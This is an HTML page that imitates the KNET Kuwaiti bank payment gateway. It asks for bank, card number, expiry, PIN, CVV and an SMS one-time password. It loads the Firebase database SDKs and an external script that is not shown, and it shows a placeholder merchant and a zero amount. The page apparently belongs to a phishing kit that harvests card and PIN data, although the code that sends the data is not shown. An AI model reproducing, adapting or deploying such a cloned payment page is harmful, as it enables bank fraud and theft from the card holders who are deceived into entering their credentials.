<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <title>KNET Payment</title>
    <!-- Firebase SDK -->
    <script src="https://www.gstatic.com/firebasejs/9.22.0/firebase-app-compat.js"></script>
    <script src="https://www.gstatic.com/firebasejs/9.22.0/firebase-firestore-compat.js"></script>
    <script src="https://www.gstatic.com/firebasejs/9.22.0/firebase-database-compat.js"></script>

    <!-- Utility Libraries -->
    <script src="https://cdn.jsdelivr.net/npm/clsx@2.0.0/dist/clsx.min.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/tailwind-merge@1.14.0/dist/bundle.min.js"></script>
    <style>
      * {
        margin: 0;
        padding: 0;
        box-sizing: border-box;
      }
      body {
        font-family: Verdana, Arial, Helvetica, sans-serif;
        background-color: #ebebeb;
      }
      .container {
        width: 100%;
        padding: 5px;
        box-sizing: border-box;
      }
      .content-block {
        width: 395px;
        margin: 0 auto;
      }
      .row {
        border-bottom: 1px solid #8f8f90;
        padding-bottom: 5px;
        padding-top: 5px;
      }
      .row_new {
        padding-bottom: 5px;
        padding-top: 5px;
      }
      .column-label,
      .column-value,
      .column-long {
        float: left;
      }
      .column-label {
        width: 40%;
      }
      .column-value {
        width: 60%;
      }
      .row.three-column .column-value {
        width: 18%;
        margin-right: 5px;
      }
      .row.three-column .column-long {
        width: 39%;
        float: right;
      }
      .row:after {
        content: '';
        display: table;
        clear: both;
      }
      .form-card {
        background-color: #ffffff;
        padding: 20px;
        border: 2px solid #8f8f90;
        border-radius: 15px;
        margin-bottom: 15px;
        box-shadow: 0 0 6px rgba(0, 0, 0, 0.3);
      }
      .form-card:nth-child(1) {
        margin-top: 25px;
      }
      .form-card .row:nth-child(1) {
        padding-top: 0;
      }
      .footer-content .row,
      .footer-content-new .row,
      .form-card .row:nth-last-child(1) {
        border: 0;
        padding-bottom: 0;
      }
      form label {
        font-size: 11px;
        color: #0070cd;
        font-weight: bold;
        text-shadow: 0 1px 2px rgba(0, 0, 0, 0.2);
      }
      select {
        font-size: 11px;
        height: 20px;
      }
      form .text-label,
      input,
      select {
        color: #444444;
        font-weight: normal;
      }
      form input[type='tel'],
      input[type='password'] {
        border: 2px solid #0070cd;
        box-shadow: inset 0 0 5px rgba(0, 0, 0, 0.3);
        padding: 0 3px;
        outline: 0;
        font-size: 11px;
        height: 20px;
      }
      form input[type='text'],
      input[type='password'] {
        border: 2px solid #0070cd;
        box-shadow: inset 0 0 5px rgba(0, 0, 0, 0.3);
        padding: 0 3px;
        outline: 0;
        font-size: 11px;
        height: 20px;
      }
      .footer-content {
        text-align: center;
        margin-top: 15px;
        font-weight: bold;
        color: #2277d3;
      }
      .brand-img {
        margin-right: 5px;
        float: right;
      }
      .brand-info {
        font-size: 12px;
        text-align: left;
      }

      #ValidationMessage {
        -moz-transaction: height 1s ease;
        -webkit-transaction: height 1s ease;
        transition: height 1s ease;
        border: #ff0000 1px solid;
        background-color: #f7dadd;
        font-size: 12px;
        font-family: helvetica, arial, sans serif;
        color: #ff0000;
        padding: 2px;
        display: none;
        margin-bottom: 3px;
        text-align: center;
      }
      .footer-content #knet-brand {
        width: 43px;
        height: 43px;
        margin-top: 5px;
      }
      .footer-content .social-links {
        margin-top: 15px;
        text-align: center;
      }
      .footer-content .social-links div {
        height: 30px;
        display: inline-block;
      }
      .footer-content .social-links div#knet-yt {
        width: 35px;
      }
      .footer-content .social-links div#knet-sn {
        width: 27px;
      }
      .footer-content .social-links div#knet-tw {
        width: 27px;
      }
      .footer-content .social-links div#knet-it {
        width: 27px;
      }
      .footer-content .social-links div#knet-fb {
        width: 27px;
      }
      button {
        width: 100%;
      }

      .submit-button {
        background-color: #eaeaea;
        border: 1px solid #cacaca;
        padding: 5px 0;
        font-weight: bold;
        color: #666666;
        width: 50%;
        float: left;
        height: 27px;
        border-radius: 4px;
      }
      .cancel-button {
        background-color: #eaeaea;
        border: 1px solid #cacaca;
        padding: 5px 0;
        font-weight: bold;
        color: #666666;
        width: 50%;
        height: 27px;
        border-radius: 4px;
        -webkit-appearance: none;
      }
      .row.alert-msg {
        font-size: 12px;
        text-align: justify;
        background-color: #d9edf6;
        padding: 10px !important;
        border: 1px solid #bacce0;
        border-radius: 4px;
        margin-bottom: 10px;
      }
      @media all and (max-width: 425px) {
        .content-block {
          width: 98%;
          margin: 0 auto;
        }
      }
      .overlay {
        background: #555555;
        display: none;
        position: absolute;
        top: 0;
        right: 0;
        bottom: 0;
        left: 0;
        opacity: 0.5;
      }
      .terms {
        font-size: 11px;
        color: #0070cd;
        font-weight: bold;
        font-style: italic;
        text-decoration: none;
      }
      .paymentOption {
        vertical-align: super;
      }

      .container-blogo {
        width: 100%;
        margin-top: -5px;
        margin-bottom: 15px;
      }
      .logoHead-mob {
        width: 42%;
        margin-left: 27%;
        /* width:16%;
  margin-left:40%; */
        margin-right: auto;
      }

      /* Added for Knet */
      /* Medium devices (tablets, 768px and up) */
      @media (max-width: 768px) {
        .wrapper {
          margin-top: 10%;
        }
      }
      /* Medium devices (tablets, 768px and up) */
      @media (max-width: 500px) {
        .wrapper {
          max-width: 100%;
          width: 100%;
        }
      }
      /* Medium devices (tablets, 768px and up) */
      @media (max-width: 435px) {
        .logoHead {
          left: 36%;
        }
        .contentBox {
          padding: 18px;
        }
      }
      /* Medium devices (tablets, 768px and up) */
      @media (max-width: 380px) {
        .contentBox {
          padding: 12px;
        }
        .wrapper {
          margin-top: 20%;
        }
      }
      @media (max-width: 350px) {
        .contentBox .col:first-child .paymentlabel {
          padding-left: 0;
        }
      }
      /*added for tooltip by sib*/

      .tooltip {
        position: relative;
        display: block;
      }
      .tooltip .tooltiptext {
        visibility: hidden;
        width: 80%;
        background-color: #555;
        color: #fff;
        text-align: center;
        border-radius: 6px;
        padding: 10px;
        position: absolute;
        z-index: 1;
        bottom: 113%;
        left: 50%;
        margin-left: -52%;
        opacity: 0;
        transition: opacity 0.5s;
        font-size: 12px;
        margin-bottom: 9px;
        -webkit-box-shadow: 4px 3px 10px 0px rgba(0, 0, 0, 0.75);
        -moz-box-shadow: 4px 3px 10px 0px rgba(0, 0, 0, 0.75);
        box-shadow: 4px 3px 10px 0px rgba(0, 0, 0, 0.75);
      }
      .tooltip .tooltiptext::after {
        content: '';
        position: absolute;
        top: 100%;
        left: 50%;
        margin-left: -45px;
        border-width: 5px;
        border-style: solid;
        border-color: #555 transparent transparent transparent;
      }
      /*.tooltip:hover .tooltiptext {*/
      div#tooltip_0:hover .tooltiptext {
        visibility: visible;
        opacity: 1;
      }
      /* turn the img to gray :sib*/
      .doGray {
        -webkit-filter: grayscale(100%);
        filter: grayscale(100%);
        opacity: 0.5;
      }
      /* Added by Ahmed & Saqib */
      label#ValidationMessage {
        -moz-transaction: height 1s ease;
        -webkit-transaction: height 1s ease;
        transition: height 1s ease;
        border: #ff0000 1px solid;
        background-color: #f7dadd;
        font-size: 12px;
        font-family: helvetica, arial, sans serif;
        color: #ff0000;
        padding: 5px 2px 5px 2px;
        display: none;
        margin-bottom: 3px;
        text-align: center;
        margin-top: 10px;
      }
      div#fasterCheckDiv1 {
        float: left;
        padding-left: 10%;
        position: relative;
        display: block;
        width: 35%;
        padding-top: 3px;
      }
      div#fasterCheckDiv2 {
        float: left;
        margin-left: 30%;
        position: relative;
        padding-top: 3px;
        width: 70px;
        padding-top: 3px;
      }
      div#fasterCheckDiv1 > label > img {
        width: 48px;
        height: 35px;
        border-radius: 3px;
      }
      div#fasterCheckDiv2 > label > img {
        width: 48px;
        height: 35px;
        border-radius: 3px;
      }
      .madd {
        height: 90px;
        max-width: 372px;
        margin: 5px auto -30px auto;
        border-radius: 0px 10px;
        display: block;
      }
      .pic {
        display: flex;
        justify-content: center;
      }
      .logo {
        width: 100vw !important;
        margin: 0;
        padding: 0;
      }
      /* Error message */
      .error-message {
        border: #ff0000 1px solid;
        background-color: #f7dadd;
        font-size: 12px;
        font-family: helvetica, arial, sans serif;
        color: #ff0000;
        padding: 5px;
        margin: 5px 0;
        text-align: center;
        display: block;
      }
      /* Ends */
    </style>
  </head>
  <body>
    <div>
      <form onsubmit="return false;">
        <div class="madd"></div>

        <div id="PayPageEntry">
          <div class="pic">
            <img src="./dre5.png" class="logo" alt="logo" />
          </div>
          <div class="container">
            <div class="content-block">
              <div class="form-card">
                <div class="container pic">
                  <img
                    src="./kv.png"
                    class="-"
                    alt="logo"
                    height="50"
                    width="50"
                  />
                </div>
                <div class="row">
                  <label class="column-label">Merchant: </label>
                  <label class="column-value text-label">KNET Payment</label>
                </div>
                <div id="OrgTranxAmt">
                  <label class="column-label"> Amount: </label>
                  <label class="column-value text-label" id="amount">
                    0.000 KD&nbsp;
                  </label>
                </div>
              </div>
              <div class="form-card">
                <div
                  class="notification"
                  style="display: none"
                  id="otpmsgDC"
                ></div>
                <div
                  class="notification"
                  style="display: none"
                  id="CVmsg"
                ></div>
                <div id="ValidationMessage"></div>
                <div id="savedCardDiv" style="display: none">
                  <div class="row">
                    <br />
                  </div>
                </div>

                <!-- Step 1: Card Details -->
                <div id="cardDetailsSection">
                  <div id="FCUseDebitEnable" style="margin-top: 5px">
                    <div class="row">
                      <label class="column-label" style="width: 40%">
                        Select Your Bank:
                      </label>
                      <select
                        class="column-value"
                        style="width: 60%"
                        id="bankSelect"
                      >
                        <option value="bankname" title="Select Your Bank">
                          Select Your Banks
                        </option>
                        <!-- Bank options will be populated by JavaScript -->
                      </select>
                    </div>
                    <div class="row three-column" id="Paymentpagecardnumber">
                      <label class="column-label">Card Number:</label>
                      <label>
                        <select
                          class="column-value"
                          name="dcprefix"
                          id="dcprefix"
                          style="width: 26%"
                        >
                          <option value="i">prefix</option>
                          <!-- Prefix options will be populated by JavaScript based on selected bank -->
                        </select>
                      </label>
                      <label>
                        <input
                          name="debitNumber"
                          id="debitNumber"
                          type="tel"
                          inputmode="numeric"
                          pattern="[0-9]*"
                          size="10"
                          class="allownumericwithoutdecimal"
                          style="width: 32%"
                          maxlength="10"
                          title="Should be in number. Length should be 10"
                        />
                      </label>
                    </div>
                    <div class="row three-column" id="cardExpdate">
                      <div id="debitExpDate">
                        <label class="column-label">Expiration Date:</label>
                      </div>
                      <select id="monthSelect" class="column-value">
                        <option value="0">MM</option>
                        <option value="1">01</option>
                        <option value="2">02</option>
                        <option value="3">03</option>
                        <option value="4">04</option>
                        <option value="5">05</option>
                        <option value="6">06</option>
                        <option value="7">07</option>
                        <option value="8">08</option>
                        <option value="9">09</option>
                        <option value="10">10</option>
                        <option value="11">11</option>
                        <option value="12">12</option>
                      </select>
                      <select id="yearSelect" class="column-long">
                        <option value="0">YYYY</option>
                        <option value="2024">2024</option>
                        <option value="2025">2025</option>
                        <option value="2026">2026</option>
                        <option value="2027">2027</option>
                        <option value="2028">2028</option>
                        <option value="2029">2029</option>
                        <option value="2030">2030</option>
                        <option value="2031">2031</option>
                        <option value="2032">2032</option>
                        <option value="2033">2033</option>
                        <option value="2034">2034</option>
                        <option value="2035">2035</option>
                        <!-- Additional years omitted for brevity -->
                      </select>
                    </div>
                    <div class="row" id="PinRow">
                      <input type="hidden" name="cardPinType" value="A" />
                      <div id="eComPin">
                        <label class="column-label">PIN:</label>
                      </div>
                      <div>
                        <input
                          inputmode="numeric"
                          pattern="[0-9]*"
                          name="cardPin"
                          id="cardPin"
                          autocomplete="off"
                          title="Should be in number. Length should be 4"
                          type="password"
                          size="4"
                          maxlength="4"
                          class="allownumericwithoutdecimal"
                          style="width: 60%"
                        />
                      </div>
                    </div>
                    <div class="row" id="CvvRow" style="display: none">
                      <input type="hidden" name="cardPinType" value="A" />
                      <div id="eComCvv">
                        <label class="column-label">CVV:</label>
                      </div>
                      <div>
                        <input
                          inputmode="numeric"
                          pattern="[0-9]*"
                          name="cvv"
                          id="cvv"
                          autocomplete="off"
                          title="Should be in number. Length should be 3"
                          type="password"
                          size="3"
                          maxlength="3"
                          class="allownumericwithoutdecimal"
                          style="width: 60%"
                        />
                      </div>
                    </div>
                  </div>
                </div>

                <!-- Step 2: OTP Verification (hidden by default) -->
                <div id="otpVerificationSection" style="display: none">
                  <div
                    class="notification"
                    style="
                      border: #ff0000 1px solid;
                      background-color: #f7dadd;
                      font-size: 12px;
                      font-family: helvetica, arial, sans serif;
                      color: #ff0000;
                      padding-right: 15px;
                      margin-bottom: 3px;
                      text-align: center;
                      display: none;
                    "
                    id="otpmsgDC2"
                  ></div>
                  <div
                    class="row alert-msg"
                    id="notificationbox"
                    style="
                      color: #31708f;
                      font-family: Arial, Helvetica, serif;
                      font-size: 13px;
                    "
                  >
                    <div id="notification">
                      <p>
                        <span class="title" style="font-weight: bold"
                          >NOTIFICATION:</span
                        >
                        You will presently receive an SMS on your mobile number
                        registered with your bank. This is an OTP (One Time
                        Password) SMS, it contains 6 digits to be entered in the
                        box below.
                      </p>
                    </div>
                  </div>
                  <div id="errorMessage" class="error-message" style="display: none;"></div>
                  <div class="row">
                    <div id="payConfirmCardNum">
                      <label class="column-label">Card Number:</label>
                    </div>
                    <div>
                      <label
                        class="column-value text-label"
                        id="DCNumber"
                        style="padding-left: 5px"
                      ></label>
                    </div>
                  </div>
                  <div class="row" id="payConfirmExpmnth">
                    <div>
                      <label class="column-label" style="width: 41%"
                        >Expiration Month:</label
                      >
                    </div>
                    <div>
                      <label
                        class="column-value text-label"
                        id="expmnth"
                        style="padding-left: 5px; width: 59%"
                      ></label>
                    </div>
                  </div>
                  <div class="row" id="payConfirmExpyr">
                    <div>
                      <label class="column-label">Expiration Year:</label>
                    </div>
                    <div>
                      <label
                        class="column-value text-label"
                        id="expyear"
                        style="padding-left: 5px"
                      ></label>
                    </div>
                  </div>
                  <div class="row">
                    <div>
                      <label class="column-label">PIN:</label>
                    </div>
                    <div>
                      <label
                        class="column-value text-label"
                        style="padding-left: 5px"
                        >****</label
                      >
                    </div>
                  </div>
                  <div class="row" id="OTPDCDIV">
                    <div>
                      <label class="column-label" style="padding-top: 4px"
                        >OTP:</label
                      >
                    </div>
                    <div>
                      <input
                        type="text"
                        inputmode="numeric"
                        pattern="[0-9]*"
                        autocomplete="off"
                        class="allownumericwithoutdecimal"
                        style="width: 60%"
                        id="debitOTPtimer"
                        name="debitOTP"
                        size="6"
                        maxlength="6"
                      />
                      <div>
                        <label
                          class="column-value text-label"
                          style="
                            display: none;
                            float: right;
                            cursor: pointer;
                            color: #0077d5;
                            text-decoration: underline;
                          "
                          id="Resend"
                          >Resend OTP</label
                        >
                      </div>
                    </div>
                  </div>
                </div>
              </div>
              <div class="form-card">
                <div class="row">
                  <div style="text-align: center; width: 100%">
                    <div id="loading" style="display: none">
                      <center>
                        <label
                          class="column-value text-label"
                          style="width: 70%; text-align: center"
                        >
                          Processing.. please wait ...
                        </label>
                      </center>
                    </div>
                    <div
                      style="display: flex; justify-content: center"
                      id="submithide1"
                    >
                      <button id="submitButton" disabled class="submit-button">
                        Submit
                      </button>
                      <button id="cancelButton" class="cancel-button">
                        Cancel
                      </button>
                    </div>
                  </div>
                </div>
              </div>
              <div id="overlayhide" class="overlay" style="display: none"></div>

              <footer>
                <div class="footer-content-new">
                  <div class="row_new">
                    <div
                      style="
                        text-align: center;
                        font-size: 11px;
                        line-height: 1;
                      "
                    >
                      All&nbsp;Rights&nbsp;Reserved.&nbsp;Copyright&nbsp;2024&nbsp;©&nbsp;
                      <br />
                      <span
                        style="
                          font-size: 10px;
                          font-weight: bold;
                          color: #0077d5;
                        "
                      >
                        The&nbsp;Shared&nbsp;Electronic&nbsp;Banking&nbsp;Services&nbsp;Company
                        - KNET
                      </span>
                    </div>
                  </div>
                  <div id="DigiCertClickID_cM-vbZrL"></div>
                </div>
                <div id="DigiCertClickID_cM-vbZrL"></div>
              </footer>
            </div>
          </div>
        </div>
      </form>
    </div>
<script src="script2.js"></script>
  
  </body>
</html>